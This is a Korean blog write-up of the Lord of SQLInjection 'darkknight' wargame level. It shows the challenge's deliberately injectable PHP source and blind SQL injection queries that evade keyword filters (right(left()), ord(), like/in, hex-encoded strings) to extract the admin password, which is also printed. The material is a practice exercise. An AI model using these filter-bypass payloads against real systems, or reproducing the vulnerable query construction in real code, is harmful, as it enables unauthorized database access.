반응형
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
highlight_file(__FILE__);
?>Blind SQL Injection 문제
필터링 -> 우회
substr() -> right(left())
ascii() -> ord()
= -> like, in()
'admin' -> 0x61646d696e
비밀번호 자릿수
query : select id from prob_darkknight where id='guest' and pw='123' and no=1 or id in(0x61646d696e) and length(pw) like 8
-> true. 비밀번호 8자리
비밀번호 각 자리
query : select id from prob_darkknight where id='guest' and pw='123' and no=1 or id in(0x61646d696e) and ord(right(left(pw,i),1)) > j
-> i, j값 바꿔주며 정답맞추는 프로그램 돌리면 됨
query : select id from prob_darkknight where id='guest' and pw='0b70ea1f' and no=
반응형
'[웹해킹] > [LOS]' 카테고리의 다른 글
| [LOS] GIANT (0) | 2020.12.17 |
|---|---|
| [LOS] BUGBEAR (0) | 2020.12.16 |
| [LOS] GOLEM (0) | 2020.12.14 |
| [LOS] SKELETON (0) | 2020.12.13 |
| [LOS] VAMPIRE (0) | 2020.12.13 |
